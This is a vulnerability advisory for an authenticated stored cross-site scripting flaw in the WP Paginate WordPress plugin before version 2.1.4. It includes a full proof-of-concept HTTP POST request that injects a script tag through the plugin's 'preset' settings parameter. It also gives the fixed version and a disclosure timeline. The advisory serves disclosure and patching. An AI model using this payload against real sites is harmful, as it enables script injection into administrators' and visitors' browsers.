WP Paginate < 2.1.4 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The WP Paginate WordPress plugin, version 2.1.3 and possibly below, was vulnerable to Stored Cross-Site Scripting (XSS) in the plugin's preset settings parameter. The form did require a valid CSRF nonce, limiting the exploitability of the vulnerability.
Proof of Concept
POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 385 Origin: http://wp.lab Connection: close Cookie: [Admin Cookies] _wpnonce=6dbb0cc5f5&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes&preset='%3e%3cscript%3ealert(/XSS/)%3c%2fscript%3e
Affects Plugins
Fixed in version 2.1.4✓
References
Classification
Miscellaneous
Timeline
Publicly Published
2021-01-05 (about 8 months ago)
Added
2021-01-07 (about 8 months ago)
Last Updated
2021-01-09 (about 8 months ago)